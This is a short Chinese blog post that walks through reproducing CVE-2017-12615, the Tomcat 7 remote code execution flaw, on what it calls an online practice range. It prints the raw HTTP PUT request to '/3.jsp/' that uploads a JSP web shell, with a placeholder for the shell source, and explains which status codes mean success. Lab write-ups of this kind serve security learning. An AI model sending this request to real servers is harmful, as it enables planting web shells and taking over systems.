CVE-2017-12615 Tomcat远程代码执行漏洞复现
程序员文章站
2022-03-23 18:08:41
...
CVE-2017-12615 Tomcat远程代码执行漏洞复现
漏洞编号
CVE-2017-12615
影响范围
Apache Tomcat 7.0.0-7.0.81
复现用的公网在线靶场
http://bc.csxa.cn:9000/#/dashboard
poc
PUT /3.jsp/ HTTP/1.1
Host:你的IP和端口
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 9952
这里填写你jsp木马源码
返回状态是200 或者201 都是成功上传,返回400 或者 500 就是上传不成功
上传成功
Flag位置
完
上一篇: php如何删除自己